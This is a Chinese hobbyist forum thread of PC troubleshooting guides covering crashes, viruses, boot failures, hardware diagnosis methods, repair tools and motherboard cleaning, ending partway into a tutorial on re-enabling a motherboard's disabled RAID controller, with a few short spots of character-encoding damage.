>>>>应对之策：当机分2种，真当和假当，二者区分的最简单方法是按下小键盘区的Numlock键，观察其指示灯有无变化。有，则假当；反之，真当。假当可以同时按下ALT+CTRL+DEL在出现的任务列表里选定程序名后标注没有响应的项，单击结束任务。真当，只有冷启动了。对于蓝屏，在按下ESC键无效后，选择重启，按机箱面板上的复位键。对于兼容性问题，可以从卸载“问题”软件和更新主板BIOS和相关主板驱动程序上来解决。
病毒发作
>>>>现象：系统运行缓慢，当机，非法操作，硬盘灯乱闪，经常蓝屏，以及莫名奇妙的系统提示……
>>>>现象分析：病毒实质上是一种恶意的电脑程序代码，病毒通过大量的自身复制，同时在系统中隐秘运行，占有系统资源，严重的还会对软件和硬件造成破坏，如CIH，硬盘锁等。
应对之策：道高一尺，魔低一丈，病毒的克星是杀毒软件。一旦怀疑自己的机器染上病毒，请重新启动系统到DOS，运行正版的杀毒软件（DOS版）这样可以杀掉在“吻到死”下杀不了的病毒；而后再启动到系统桌面，运行杀毒软件的WINDOWS版本进行再杀毒。另一方面，由于病毒发作严重时会破坏一些文件；我们就在病毒发作之前把重要的文件备份到Ｃ盘之外其它驱动器，且把数据文件的属性设定为只读。同时，大家要时刻更新杀毒软件病毒库，少用盗版碟，已上网的朋友们对不明的邮件附件千万不要下载。
系统故障
>>>>现象：进不了系统，典型表现为开机自检通过，在启动画面处停止，或显示：The disk is error等有E文提示的诸多现象。
>>>>现象分析：此为系统故障，可由很多原因引起，比较常见的就是系统文件被修改，破坏，或是加载了不正常的命令行。此外，硬盘的故障也是原因之一。
>>>>应对之策：首先要尝试能否进入安全模式，开机按F８键，选择启动菜单里的第三项：Safe model（安全模式）。进入安全模式后，可以通过设备管理器和系统文件检查器来找寻故障，遇到有“?gt;>焙诺目梢圆槊髡碓偃范ㄊ欠馾el或设置中断。也可以重装驱动程序，系统文件受损可以从安装文件恢复（建议事先就把WINDOWS的安装盘复制在硬盘里）。如果连安全模式都不能进入，就通过带启动的光盘或是软盘启动到DOS，在DOS下先杀毒并且用Dir检查Ｃ盘内的系统文件是否完整，必要时可通过系统软盘进行Sys C:，恢复相关的基本系统文件。如果C盘内没有发现文件，则只有对系统进行彻底重装。
驱动丢失
>>>>现象：开机时16色显示，放音频文件时显示“XXX”设备正被占用。
>>>>现象分析：排除病毒的原因后，这种现象多发生在用过N个月的老机子上，或用户新近动过主机内的部件，（如显卡和PCI卡），则可能造成该硬件的接触不良，导致系统实质上并没有彻底检测到相关硬件。
>>>>应对之策：重新安装显卡的驱动程序，并检查相关配件与主板是否完全接触：一是要保证显卡，声卡金手指上的清洁，二是将其插入相关插槽时用力适当，对准垂直插入即可，再接上与之搭配的音箱和显示器连线。必要时，可以更换PCI卡的插槽位置，避免和显卡产生资源冲突。
开机黑屏
>>>>现象：开机黑屏，没有显示，可能会有报警声。
>>>>现象分析：硬件之间接触不良，或硬件发生故障，相关的硬件涉及到内存，显卡，CPU，主板，电源等。电脑的开机要先通过电源供电，再由主板的BIOS引导自检，而后通过CPU，内存，显卡等。这个过程反映在屏幕上叫自检，先通过显卡BIOS的信息，再是主板信息，接着内存，硬盘，光驱等。如果这中间哪一步出了问题，电脑就不能正常启动，甚至黑屏。
>>>>应对之策：首先确认外部连线和内部连线是否连接顺畅。外部连线有显示器，主机电源等。内部有主机电源和主机电源接口的连线（此处有时接触不良）。比较常见的原因是：显卡，内存由于使用时间过长，与空气中的粉尘长期接触，造成金手指上的氧化层，从而导致接触不良。对此，用棉花粘上适度的酒精来回擦拭金手指，待干后插回。除此外，观察CPU是否工作正常，开机半分钟左右，用手触摸CPU风扇的散热片是否有温度。有温度，则CPU坏掉的可能性就可基本排除。没温度就整理一下CPU的插座，确保接触到位。这之后还没温度，阁下的CPU就可以升级了：（除了上面的方法外，还有一招必杀技：用拔跳线的方法清除BIOS设置或更换主板的CMOS电池。当这些方法都尝试过并全部失败的话，就可以召唤大虾哥出山相助了。
怪响异味
>>>>现象：听到怪响或者闻到异味。
>>>>现象分析：怪响，可能是由于硬盘的坏道造成硬盘发出的（格格的刺耳声）；也有可能是硬盘，光驱螺丝没有上牢，造成机箱的共振。异味，多为焦糊味，很刺鼻子的那种。
>>>>应对之策：首先关闭电源。若是怪响，则打开机箱面板，一一检查，若是坏道，则修复或屏蔽。对于异味，要千万小心。这时用你的鼻子闻闻，找到发出异味的部件，然后卸下交由电脑公司处理，在这中间，大家一定要捍卫自己的消费者权益。（没过质保期的——该换的换，该修的修。）这个千万大意不得！因为，笔者的昂达光驱就是闻到焦糊味后断电不及（慢了N秒）给活活烧坏驱动芯片的，而后，再拿钱找JS大叔也没办法。（所以大家如果闻到异味，马上断掉电源，然后再下开机箱寻找原因，但是显示器千万别开，只能交由专业人员维修，那可是有高压电的，千万别拿自己的生命开玩笑。
[ Last edited by 帅气十足也 on 2005-2-17 at 08:46 ]

呵呵~~~怎么有时间到这里来了~~~~
不错~~~

电脑故障排除的一般分析方法和技巧电脑故障排除的一般分析方法和技巧
本人将从软、硬件故障入手，介绍排除故障的一般分析方法及一些常用的急救小技巧。
硬故障的一般分析方法
在电脑出现硬故障后，首先应该先排除一些不真正属于故障的问题，比如说电脑接头松
动，数据线掉落等。排除这些因素后，再结合实际情况去排除电脑故障。下面举几个例子，
说明硬件故障的一般分析方法。
1、电源正常，屏幕上无任何信息，喇叭没有任何声音
出现这种状况一般不是控制卡电源的问题，因为如果电源问题，比如短路，则风扇将不
能正常转动。这可能是由主板或者内存控制卡局部短路造成的。这时，应该关闭电源，打开
机箱，利用拔插法，将一些功能卡拔掉，然后开机，看电脑是否正常工作，如果正常，则说
明这块插件没问题，继续利用这种方法试试其他的控制卡，如果检查到那个卡出现问题，就
根据具体情况对其进行处理。
2、电脑没有任何的反映
这时应该首先检查电源是否工作，或者电源风扇是否转动，根据具体情况进行修理，然
后再考虑其他问题。
3、开机后，显示屏上只有光标，但是无法通过自检
此时，首先关闭机器，打开机箱，把主板上的其他扩充卡拔掉，只剩下显示卡，然后，
重新启动电脑，如果仍然无法出现自检程序，则说明主板问题，因为自检程序的显示都保留
在主板的ROM BIOS里面。
4、开机时有声音，但是屏幕上无任何信息
这种情况的故障可能出现在内存和显示上，因为在电脑的自检过程中，首先检查的内存
是前64KB的内存，如果有问题，就出现声音报警，这时候显示卡还没有安初始化和被检查；
如果内存没问题，而显示卡有问题，也会有报警声音的。既然有声音，说明主板没有问题，
而是内存或显示卡的问题。这样问题不就出来了吗，所以说如果网友们遇到这样类似的情况
先不要忙着找人来修，只有冷静下来自己慢慢地找，问题总会解决的。
5、显示卡的问题
采用前面介绍的交换法，用一块大致相同的显卡替换原来的，如果问题不存在了，证明
原来的显示卡有问题，否则，再进行其他硬件的检查。
6、主板有问题
这类问题也可以用替换法，首先检查一下内存条，因为可能是内存条的类型不被主板支
持或者内存的主频和主板不相匹配，比如有很多主板都不支持EDO内存。如果内存没问题了，
再检测主板的问题。
7、内存的判断错误
如果内存的前64KB出错，系统将无法正常启动；如果后64KB内存有错误（这里说有是没
有其他故障时），那么将屏幕上出现错误信息。首先检查内存是否插好，前64KB内存出错的
情况，一般可通过更换内存条的办法来判断，更换后，如果能够正常通过自检，显示信息，
则说明原来在BANK0位置上的内存有问题，解决办法是更换内存条；如果更换后还是错误，那
么可以将电脑原来的内存拿到别的电脑上测试，如果原来的内存在别人的电脑上可以正常运
行，那么说明是内存和主板之间不兼容，主板的跳线设置，或者主板/CPU有问题，可以通过
更换CPU等方法，进一步确定故障的原因。反之，如果原来的内存不能在别人电脑上正常应用
，那只能更换内存了。
当然，在应用上面的分析方法时，首先要确认一下，各硬件设备的安装是否正确，然后
再根据情况进行分析，免得浪费了时间和精力，耽误了其他的时间。
总的说来，当你的电脑出现问题的时候，总是有办法解决的，希望大家不要灰心，相信自己
才是真正的胜利。
软故障的分析方法与排除方法
电脑软故障的判断及修复较为复杂和困难。当地电脑出现故障的时候，首先要判断出电
脑故障是属于硬故障还是软故障，切不可将软故障误认为硬故障，或者反之。
当确认故障属于软故障后，应从多方面去分析故障的原因。因为软故障可能是由于操作系统
出错造成的，也可能是应用软件造成的，也可能是操作人员误操作造成的，或者是用户对系
统和软件的一些不正常的设置造成的等，应采用相应的方法进行分析。
电脑软故障的一般分析方法主要有：
1、 系统故障分析
如果是系统故障，则应该着重检查下面的内容：
1） 系统文件是否正常
2） 所用的DOS或者WINDOWS操作系统的版本是不是兼容
3） 多种操作系统之间是浊兼容
4） 系统的CONFIG。SYS文件或者WINDOWS的注册文件是否正确
5） 电脑的内存是否出错
2、 程序故障分析
如果认定是程序故障，须要检查下面的内容：
1） 程序的运行环境是不是适合
2） 程序的安装方法是不是正确
3） 程序本身是否完整
4） 程序本身是否有总是或BUG5） 程序的操作方法是否正确
6） 程序是否和其他软件发生冲突
3、 病毒影响分析
当前，电脑病毒十分猖獗，而且更具有破坏性、潜伏性。电脑染上病毒，不但会影响电
脑的正常运行，使机器速度变慢，严重的时候还会造成整个电脑的彻底崩溃。下面介绍几个
电脑病毒引起的异常状况：
1） 前后两次运行程序时，前一次能正常运行，后一次就不能了
2） 硬盘不能启动
3） 键盘无响应
4） 鼠标失灵
5） 打印机不能打印
6） 在操作时莫名其妙地出现蓝屏
7） 电脑在正常运行时突然重新启动
8） 机器里出现一些莫名其妙的文件或程序
电脑病毒多种多样，需要在实际中不断认识，同时应该注意做好防范，尤其是在连接到
网络的时候。因为病毒传播的一个主要途径就是网络。
在检修软故障的时候，可以参考以下经验：
1） 遇到电脑故障的时候，不要慌张，应该仔细观察电脑的工作状况，根据出现的
异常现象及电脑给出的错误提示，结合所掌握的排除故障的知识进行分析，判断故障的原因
。
2） 对于电脑的软故障，首先应该判断是系统故障，还是运行程序的故障，不是被
病毒入侵了。一般情况下，系统文件除了被损坏，或者被删除、改动外，不会有太大的问题
，应用程序出问题的可能性最大，可以根据前面介绍过的方法对应用程序的运行环境和操作
进行判断和分析，排除故障。
3） 如果自己不能够排除故障，一定要找别人帮忙，或者去维修地点维修，防止故
障进一步扩大。
常见故障的诊断
正因为有软件故障又有硬件故障，且现象又复杂，所以对故障的诊断要有条理、有步骤
地进行。下面介绍一般的诊断步骤：
1、 故障诊断步骤
第一步：当电脑出现故障时，首先要确定是哪些功能不正常，进而确定是哪部分软件或硬件
的故障。如启动机器时显示器无信号，且系统喇叭一长三短的警报声，这是显示卡的故障。
又如进入WINDOWS后发现声卡不发声，这可能是驱动软件的故障，也有可以是声卡故障。
第二步：确定了是哪部分软件或硬件的故障后就要开始逐一去诊断。论断的顺序一般为先软
件后硬件，先简单、后复杂。如对于声卡的故障，首先检查驱动程序和资源是否有冲突。如
果不是软件故障，就要检查硬件。先看是否有简单的故障，如接触不良、声频数据线是否错
接等。如果不是简单故障，就要考虑是否是比较复杂的硬件故障了。这时候，故障的硬件范
围基本可以确定到某个电脑配件上了。对于这些故障，一般将有故障的配件送给专业人员维
修即可。
下面简述在第二步中进行逐一检查的三个简单有效的硬件故障诊断方法：插拔法、替换
法、和观察法。插拔法和替换法联合使用是最为有效的诊断方法。
1） 插拔法：插拔法就是当确定是电脑的哪一部分配件有故障时，可逐一将其拔出
，然后看故障是否消除。如当启动时系统警报，那么就将插件在主板上的配件逐一拔出然后
再启动；如果拔出某卡时警报消除，则此配件或此配件的插槽是故障所在。
2） 替换法：替换法就是当不确定某配件是否在故障时，可将其安装在运行正常的
电脑上，或用正常的同类配件将其替换。这样就能非常直观地诊断出是否是该配件的故障。
3） 观察法：观察法包括看、闻、和用手接触等方法。当诊断某一配件时，先看其
是否有异样，如显卡风扇是否正常转动，网卡的信号灯是否正常，配件是否有冒烟、焦黑、
变形或松动等现象。闻就是嗅觉感觉是否有焦味。用手接触，感觉元器件温度，感觉配件或
连接线是否有松动等。
2、 开机自检故障与排除
可以根据计算机启动时显示的信息对故障类型进行初步判断。
1） 如果无法开机，可能是CPU、内存或电源故障。
2） 如果开机不能完成自检，那么很可能是主板故障。
3） 如果开机自检过程中，屏幕提示“Hard disk not present”或类似的信息，则
可判断为CMOS参数设置不成功或硬盘与主板的连接不正如果
4） 如果开机自检过程中，屏幕提示：“Hard disk drive failure”或“Hard drive controller failure”或类似信息，则可能是硬盘或驱动器的硬件故障。
5） 如果开机自检过程中,屏幕提示“Missing operating system”、“Non system disk or disk error”或类似信息，则很可能是硬盘主引导分区表被破坏或者是操作系统
损坏。
6） 如果开机之后无法进入操作系统，则可能是操作系统损坏或其他硬件原因，比
如CPU风扇损坏使CPU无法正常工作。
故障诊治的一些技巧
电脑故障是多种多样的，前面分别讲述了电脑故障的一些起急救知识，当然，除了掌握
上面的基础知识外，能够了解和运用一些排除电脑的技巧，并且运用这些技巧能够更加迅速
地找到并排除故障，无论是对专业人员，不是业余维护的用户，都有很大好处。
下面告诉大家一些在电脑故障急救中的小技巧：
1）如果开机后，软盘、硬盘、光驱的面板灯都这过，但是没有显示，却可以听到读盘的声音
，这一般是电脑显示子系统的故障，可分别对显示器和显示适配器（显卡）进行检查，可以
采用交换法、静态分析法或比较法，来判定具体的情况。
2）检测硬件时，首先应看它的CMOS设置与实际配置是否一致可以用QAPLUS，WINBENGH或者别
的软件进行测试，检查电脑硬件多方面的性能，并找出故障的原因。这儿有个先决条件：硬
盘或者软盘上可以引导DOS，并且能运行QAPLUS软件或其它检测软件。
3）如果电脑不能正常引导DOS，则首先要分清楚是硬盘不能引导，还是用非硬盘方式也不能
引导，才能大体判断故障的位置。如果用软盘也不能引导，那可能有几个方面的原因：可能
是软盘驱动器被损坏，这种情况可以通过硬件替代法来检测，如果软驱坏了，则换一台新的
；也有可能是用于引导的软盘中的文件有错误，这种情况可以通过换一张启动盘，或者把这
张软盘在别的电脑进行比较来判断；还可能是电脑的其他硬件故障，比如内存、多功能卡等
，这需要根据实际情况来解决。如果是硬盘不能引导，那么就可以先用软盘引导，然后进入
DOS，再对硬盘进行检测，判断硬盘是属于软故障还是硬件故障，如果是硬盘有坏扇区，那就
要拿去修理硬盘的坏道；如果是硬盘的软故障，可结合实际情况进行修复。
4）检查主板时，习惯上先考虑对内存条进行检查；首先判断内存条是不是松动了，和内存插
槽之间的接触是不是良好，插槽是否损坏，如果这些没问题，就可以采用前面讲到的替换法
，用手通过插拔法，依次拔下内存，来检测到底故障出现在啊一条内存上。也可以把内存的
次序依次调换，观察故障现象是否出现，然后再用替换法进行检测。确定内存没有故障后，
应检查主板上的元器件是否正常，一般先检查主板的ROM，BIOS的设置，CPU的插置，主板上
的跳线和主板上的可插拔扩充卡是否有问题，根据实际情况进行解决。
5）如果开机后，显示器无显示，软盘、硬盘驱动器上的面板灯也没亮，一般来说是主板的毛
病，可以把主板卸下来，只接上喇叭，通电，看看喇叭是否发声，如果没有响声，就是主板
有故障了。
6）如果电脑显示时间、日期的速度变慢，则应该考虑及时更换主板上的备用电池，备用电池
的电压标称和根据CPU的型号不同而不同，一般有 2.8V，3.0V，3.6V等。如果发生后备用电
池电量耗尽问题，应该立即更换备用电池，以免锂电池内的液体外流到主板上，腐蚀主板线
路或其他硬软，造成更大的故障。
电脑故障多种多样，上面仅是本人在平常维护中积累的一些小技巧，用户在发现故障和排除
故障的过程中还可不断地积累经验，从而更好地操纵和掌握电脑。
[ Last edited by 帅气十足也 on 2005-2-17 at 09:39 ]

电脑故障的排除原则、必备工具和检测方法在电脑发生故障时，您可能束手无策，或者“东敲西碰”，这些都不利于故障的排除。本节
将介绍电脑故障的一般急救原则和检测方法。
电脑故障的排除原则
如果电脑发生故障，一般可按下面的步骤进行急救：
1、 先软件后硬件的原则
先软件后硬件原则指的就是，当您的电脑发生故障时，应该先从软件和操作系统上来分析原
因，排除软件方面的原因后，再开始检查硬件的故障。一定不要一开始就盲目的拆卸硬件，
避免做无用功。
首先用手中的检测软件或工具软件，比如NORTON，PCTOOLS，PCCLIN等对操作系统及其软件进
行检测，找出故障原因，然后再从硬件上动手，动手检修，排除硬件的故障，这是电脑急救
的基本原则。
2、 先外部设备后主机内部设备的原则
要遵循先外设，再主机，从大到小，逐步查找的原则，逐步找出故障点，同时应该根据给出
的错误提示来进行检修。
要仔细的确定故障发生的大体部件，如打印机、键盘、鼠标等，并查看电源的连接、信号线
的连接是否正确，因为很多故障都是因为这些原因引起的，接着再排除其他故障，最后到主
机，直至把故障原因确定到一定的设备上，然后进行故障处理。
3、 先电源后部件的原则
电源是否正常工作是决定故障是否全局性故障的关键，因此，首先要检查电源部分，比如保
险丝、工作电压等，然后再检查各个负载部件。
4、 先一般后特殊的原则
在分析一个故障时，首先要尽量考虑引起故障的一般情况，也就是最可能引起故障的原因，
比如您的扫描仪不正常工作了，首先检查一下电源接线是不是松动，或者换一根数据传送线
，或许问题就迎刃而解了。如果不行，再考虑一些特殊的故障原因。
5、 先简单后复杂的原则
在排除故障时，要先排除那些简单而容易的故障，然后再去排除那些困难的不好解决的故障
。因为在排除简单的故障的同时，或许也影响到您将要解决的困难的故障，使困难的故障变
简单，另外，如果在排除简单的故障中得到启示，会对排除困难的故障有很大的帮助，这样
，就比较容易解决了。
6、先公用后专用的原则
公用性故障可能影响许多部件，而局部性故障只影响一部分部件，因此，如果总线部分发生
了故障，应该先解决，再去排除其他局部性故障。
另外，有两条维修禁忌须注意：
首先，在弄清楚故障产生的原因前，不可贸然通电，否则可能会有更多的元器件被损坏
，给维修工作带来困难。
其次，不可在带电的情况下拔、插各种插卡、插头和接线，因为在接电情况下，拔、插各种
适配卡会产生很强的瞬间反激电压，足以击毁芯片，另外带电插拔也会使很多多外部设备的
连接电缆和相应的接口损坏。
掌握了上面的急救原则，就可以根据原则进行急救了，但是还需要一定的工具。
电脑故障排除的必备工具
合理地利用各种工具进行检修，可以迅速地查明和排除电脑故障。
1、 清洗工具
电脑使用一段时间后，应当进行全面清洗，否则就会产生一些故障。比如当软盘驱动器出现
读写错误时，应首先检查驱动器磁头是不是脏了。因此须要准备一套磁头清理工具，如清理
盘、酒精、毛刷、脱脂棉等。
2、 检测和检修时必备的系统和工具软件
软件是电脑中必不可少的组成部分，排除电脑故障也离不开一些适当软件，下面介绍几种在
电脑故障急救必备的工具。
(1)电脑的诊断、维护盘：在诊断电脑故障的时候，最好借助一些诊断工具和软件，最好备有
各种系统和机型的随机诊断盘。现介绍以下几种：
1） QAPLUSA 工具：这种工具的功能很大，主要有：设置或修改电脑系统的硬件配
置参数；测试硬件系统，并提供了对硬盘进行低格、分区和高级格式化等磁盘管理的功能；
对电脑系统的硬件进行全面的诊断测试，并提供测试报告，方便用户查明故障发生的位置；
对电脑系统各部分进行诊断，测出各部分发生的故障，并且以报告的形式给出；对内存进行
映像、定位和检测等，用户可以方便地运用该工具找出故障原因。
2） NORTON和PCTOOLS工具软件包：NORTON和PCTOOLS都是功能强大的工具软件包，
包含了许多检修和维护电脑的实用工具。现在流行很多这方面的软件实用工具，有兴趣的朋
友可以试试。
（2）不同版本的DOS和WINDOWS启动盘：不同的操作系统功能有所不同，并且启动时所需的
引导文件也有很大的不同，一般表现在COMMAND.COM文件不同。有些用户在检修电脑时直接将
别人电脑上的COMMAND.COM文件拷贝到自己的电脑上，这廉洁有可能出现由于版本不同，而使
电脑不能正常工作的错误。这时就必须准备好适合自己电脑操作系统的启动盘，以便在维修
和检测时使电脑能够顺利地启动，甚至修复系统文件。
3、 病毒检查、清理盘
在电脑故障中，有很多是由于电脑中的系统文件或者数据感染上了病毒所引起的，因此，检
查和排除病毒，也是电脑检修的一个重要步骤，因此，为了更好地检修电脑，备几种优秀查
毒软件是十分必要的。目前国内使用最广泛反病毒软件有：KVW300，NORTON2000，KILL2000
，PC-CILLIN2000等，用户可以根据自己的需要进行选择。
4、 硬盘低格工具
在电脑安装系统之前，为了更换或扩充系统硬盘，或者由于硬盘无法引导，经常需要对硬盘
进行低级格式化和分区，其中有很多种方法：最常见的就是有些电脑的BIOS里提供了硬盘低
级格式化的程序（这种程序现在大多数主板都不集成了）；另外还有许多硬盘低格的工具软
件，比如，用DM和ADM对SEAGATE公司的硬盘进行低格；此外QAPLUS软件5.03以上的版本可以
对任何格式的硬盘进行低格。
5、 其他辅助工具
在电脑的急救过程中，还需要准备一些其他辅助工具，这样会对检查工作带来极大的方便。
比如，一些外部设备的数据通讯线、电缆、电源，如果用户有能力，还可以准备一套卡（显
卡、声卡、网卡等），这些都会给电脑故障急救带来方便。
此外，电脑的故障诊治，一般是对硬盘上的系统软件、驱动软件和应用软件进行检修，因此
，用户最好备份一套完整的系统软件，或者用备份替换原来被损坏的文件，使电脑恢复原来
的工作环境。另外，电脑硬盘的引导失败也是电脑的一大原因，最好事先备份好硬盘上主引
导区和引导区的一些信息，比如，当硬盘不能正常引导DOS，就可以通过DOS启动盘来引导DOS时，然后再将事先备份的硬盘主引导区和引导区的信息复制到硬盘上，将备份的FAT表信息
放到硬盘相应的区域，使硬盘能够重新引导操作系统，减少硬备数据损失，提高数据安全性
。
电脑故障的检测方法
电脑是由主板、CPU、内存、显示卡、声卡、硬盘、显示器、键盘、鼠标及电源等多个部件组
成的，这些部分都有可能发生故障。要排除故障，就必须先找到故障的原因。弄明白故障的
机理，掌握正确的检测方法、分析方法、维修技巧，就可以很快地排除电脑故障，让您的电
脑恢复正常工作。如果采用了不当的检测方法，非但不能快速找到电脑故障的所在，还有可
能浪费大量的时间。
下面介绍几种电脑故障的检测方法：
1、 原理分析法
这种方法是从理论上进行分析，按照电脑的基本原理，根据机器安排的时序关系，从逻辑上
分析各部件应有的特征，进而找出故障原因。简单的讲就是在一定的时刻，某个部件或者说
一个点应该满足一定的特征，有一个正确的外在表现，如果不满足，那么就说明这个部件可
能有故障，然后再进一步分析该部件，最终找到故障原因。这是排除电脑故障的基本方法，
但也是最复杂和最困难的方法，一般在查找故障时是不用的。
2、 诊断程序测试法
本方法简称“诊断法”，一般采用一些专门检查机器故障的程序作为工具，进行电脑故障的
检测，因为程序的作用是检测电脑故障，所以，诊断程序必须符合一定的要求：
1） 能够严格地对电脑的各个部件进行检查，能考虑到各种情况的变化，并且能给
出详细的诊断报告。在检查过程中，不仅能检查电脑各硬件的运行状况，也可以使用户对整
个系统的可靠性、系统工作能力、部件之间的相互干扰有一定的了解。
2） 发现故障时，能够尽量缩小和定位范围，这样便于用户找到故障原因，从而进
行排除。
诊断测试法可分为：简易程序测试法、检查诊断测试法和高级诊断法。
1） 简易程序诊断法：针对具体故障，通过编制简单而有效的检查程序辅助测试和
检测电脑故障的方法。一般使用这种方法时，用户要具有一定的故障现象分析能力。
2） 检查诊断测试法：采用系统提供的专用检查诊断程序业辅助查找故障，一般由
系统提供的检查诊断程序具有多个测试功能模块，可以对处理器、存储器、显示器、硬盘以
及其他硬件设备进行检测，通过详细的检查报告或者错误提示信息，使用户准确掌握电脑故
障的原因和发生位置，从而进行排除。
3） 高级诊断法：利用厂家提供的诊断程序诊断，这类程序针对某个具体部件进行
检测，提供了详细的菜单和多种检测方式，可以更为详细地对系统的各部分进行检测，通过
问题反馈流程编码让用户迅速地找到故障原因。
诊断程序测试法把理论和实践相结合，依靠已有的诊断工具，极大地方便了用户对故障的检
查。
3、 直接观察法
说简单点，就是通过看、摸、听、嗅等方式检查电脑比较典型和明显的故障。比如，观察电
脑是否有烟雾，插头插座是否松动，元器件的管脚是否断裂，硬件是否有机械操作，接触是
否良好，有没有虚焊、断线；摸电脑的元件是否发热；听电脑是否有异常的声音；嗅电脑是
否发出异味等。
4、 交换法
就是把相同的插件或者元器件互相交换位置来检查故障方法，这也是比较简单的一种检测方
法。这种方法一般应用于一些比较容易拔、插的部件，例如，声卡不发声，可以通过换一块
声卡来判断是否是主板的扩展槽被损坏；内存自检不通过，可以通过调换内存插槽或者换上
别的内存的方法，来判断故障的原因和损坏的部位；光驱、软驱不能读盘，可以通过换数据
线或换另一张盘来判断是什么问题等。这种方法适用于有相同型号的插件或者主机的情况。
5、 比较法
这种方法比较常用，就是同时运行一台故障电脑和一台正常电脑，根据两台电脑在启动或者
执行同样操作时出现的不同表现，初步判断出故障的产生部位，继而运用其他的方法进行排
除。
6、 静态特征测量和动态分析法
1） 静态特征测量法是把电脑暂停在某一待定的状态上，根据逻辑原理，用电表测
量参考点的电平，分析判断故障原因的一种方法。元器件的故障大部分能用“测量法”来检
查，但有时也可能找不到故障原因。因为有的组合条件是一个脉冲或脉冲序列，无法用“测
量法”来检查。很多故障在静态的时候不表现，因此必须使用下面介绍的动态分析法，来找
出那些只有在连续工作情况下才出现的故障。
2） 动态分析法就是设置某些条件或者编制一些程序，在电脑运行的状态下，用仪
器观察有关组件的波型或记录脉冲个数，与正常情况比较，以找出故障的原因。
上述两种方法主要针对电脑元器件故障的检测，要比普通的故障要难，所以用户要根据自己
对电脑的熟悉情况选用。
7、 拔插法
这是通过将插件或者芯片“拔出”或者“插入”来寻找故障原因的方法。此方法简单而且有
效，适合进行一般硬件检测时运用。比如，电脑在出现“死机”或者某个部件失效等很难确
定原因的故障时，从理论上分析很难，但是采用拔插法，可能迅速地找到故障的原因。
拔插法的介绍：拔出插件，每拔一块，测试一次电脑状态。当拔下一块插件后电脑恢复正常
，那么证明故障出现在刚才拔下的插件上，否则就继续依次拔下插件，直到查找到故障的原
因。另外，有些芯片、插件和扩展槽之间可能接触不良，使用拔插法可以解决因为接触不良
而使电脑不能正常运行的故障。
拔插法不仅适用于电脑故障的排除，不可用于大规模集成电路芯片的检修。
8、 升降温法
有些时候，电脑在工作时间较长或者环境温度变化时会出现一些故障,但是关机检查时却很正
常，这时候就须要用到升降温方法。
“升温法”就是人为地将环境温度升高，加速高温参数较差的元器件“发?gt;>保佣业焦?br>障的原因。
“降温法”就是对可疑部件逐一蘸酒精降温。如果部件被降温后，故障消失了，则证明了该
部件热稳定性差，须要更换。
实际上，升降温法采用了故障角触发原理，也就是用形成故障的条件促使故障频繁发生，从
而找出故障的根源。这种方法在确定了故障的大体范围后，使用起来简单、方便、易行。
在故障检测中，还有一些比较专业的检测方法，比如电源拉偏、综合法等，这些方法都需要
综合上面说到的几种方法来进行故障检测，比较复杂但很有效。这些方法比较专业，要求对
电脑的经验要高，望用户根据自己的选择使用。

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


教你如何清洗主板

《一键清理系统垃圾》

教你如何清洗主板

    板卡出厂前一般都要经过清洗的程序，一般都是用专门的洗板水，将板卡清洗烘干后焕然一新再包装出厂。这样的洗板水经过去离子和去静电处理，不会腐蚀和击穿电路板。

    其实，我们自己也可以动手清洗主板，讲究一点的话就去买专用的洗板水，否则就用不导电的二次蒸馏水，以确保清洗的水不带静电离子。注意最好不要用我们常喝的矿泉水（含太多离子杂质），也不要用自来水，这样的水经常呈弱酸或弱碱性，容易腐蚀电路板。

    假如没有把握完全烘干，清洗前最好拔下板卡上的电池、集成块等，总之拔下能拔下的所有东西。在清洗的过程中要使用比较软的刷子，并注意不要碰坏零件和焊点、电容等。

    一般来说，CPU插槽、AGP槽、PCI槽、南桥和北桥芯片底下、每个集成电路IC芯片的底下、内存槽旁边的金属触点旁边，还有BIOS芯片底下，都是不容易清理的和烘干的地方。洗刷的时候还可以使用超声波清洗仪（眼镜店一般都有）来清洗很难洗刷或者看不见的污垢，但是同时也可能对元件造成损伤。

    烘干前，我们可以通过在主板上刷酒精以加快水分蒸发。烘干主板可以使用家用的电吹风，也可以拿到修车店用高压气泵吹干。烘干机最好用风流量比较大的，这样可以把不容易烘干的地方的水强制吹出来。烘干的时候一定要彻底，不然会导致局部短路，那样报废的可能就不仅仅是主板了。另外，主板烘干后要再晾一段时间，最好使用烘灯（或家用台灯）再烤24小时，以保证加电时不会有水蒸气存在。

    按照这个原则，电脑主机里的CPU、板卡、内存甚至硬盘的电路板都可以拿出来清洗。必须要注意的是，如果确认不是由于灰尘太多造成故障的，或者不是到了万不得已的时候，最好不要单纯为了好看而清洗配件，毕竟这样做的风险相当大。


破解主板RAID功能

《一键清理系统垃圾》

破解主板RAID功能

    什么是RAID?RAID的英文全名是“Redundant Array of Inex
pensive Disk”许多人翻译为“磁盘阵列”，其优点是可以让很多磁盘驱动器同时传输数据，而这些磁盘驱动器在逻辑上又只是一个磁盘驱动器，因此可以达到单个磁盘驱动器几倍、几十倍甚至上百倍的速率，解决了CPU与磁盘驱动器之间的数据传输速率的瓶颈问题;另外，RAID还提供数据纠错功能,为数据保存提供了更高的安全性。可惜的是，这些功能目前许多玩家都只是听说而没有机会去尝试（主要是价格太高）。现在，读者们可有福了，我们可以破解部分主板的RAID功能，真实地感受RAID带给我们的方便。
    在目前市面上，有许多主板采用外加IDE控制芯片手段来提供对ATA66或100硬盘的支持。它们所采用的控制芯片主要有三家厂商生产分别是:HighPoint、AMI、Promise。需要注意的是，在这些芯片中有很大一部分原本就支持RAID功能，只是厂商们出于市场的考虑而屏蔽掉RAID功能。如何才能将屏蔽掉的RAID功能恢复呢？今天，我教大家如何打开RAID功能，只要你愿意，我们也可以拥有RAID功能。
    我们以华硕A7V主板为例，A7V主板不愧为出自名门之手。其主板采用出自名牌大厂Promise的具备RAID功能的PDC20265控制芯片。Promise公司的产品一般而言，其PDC20262型号是针对Ultra66级别的，而PDC20267和PDC20265则是针对Ultra DMA100级别的。一般在IDE RAID卡上采用的芯片是PDC20267，而主板集成的芯片大都采用PDC20265(见图1、2), 本文就是通过改造采用PDC20265芯片的主板，使之具备RAID功能。
总的来说，这个改动并不是很复杂。一般的爱好者完全可以自己动手完成，不过由于牵涉到焊接。因此，一把尖嘴烙铁是不可缺少的，此外最好再准备一块数字万用表，在改造中，我们需要使用一些电阻。

    一、改造RAID BIOS
